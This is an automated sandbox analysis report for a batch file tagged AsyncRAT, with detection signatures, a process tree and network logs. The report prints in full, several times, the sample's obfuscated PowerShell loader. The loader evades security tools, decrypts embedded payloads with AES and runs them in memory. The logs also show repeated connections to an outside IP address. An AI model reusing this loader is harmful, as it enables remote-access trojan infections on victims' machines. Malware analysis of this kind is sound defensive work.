Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Captcha_V4ID882994ft.bat

Overview

General Information

Sample name:Captcha_V4ID882994ft.bat
Analysis ID:1520617
MD5:5744e74d67f4cc91f262ddb95ac245a3
SHA1:890799de73d375478d3a5f0e2b86cec6a0585a91
SHA256:e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5
Tags:AsyncRATbatRATuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Suspicious powershell command line found
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2128 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 2728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1336, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2128, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7732, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Captcha_V4ID882994ft.batReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.4% probability
Source: global trafficTCP traffic: 192.168.2.6:49731 -> 185.91.69.119:56001
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknownTCP traffic detected without corresponding DNS query: 185.91.69.119
Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
Source: svchost.exe, 0000000F.00000002.4064491206.000001DAEF093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000006.00000002.2138380420.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2138380420.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2138380420.00000000053B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000F.00000003.2444946900.000001DAEEF00000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2284
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2284Jump to behavior
Source: classification engineClassification label: mal56.winBAT@9/12@1/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\efa01b9c3f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3ntb4tm.ugs.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Captcha_V4ID882994ft.batReversingLabs: Detection: 31%
Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
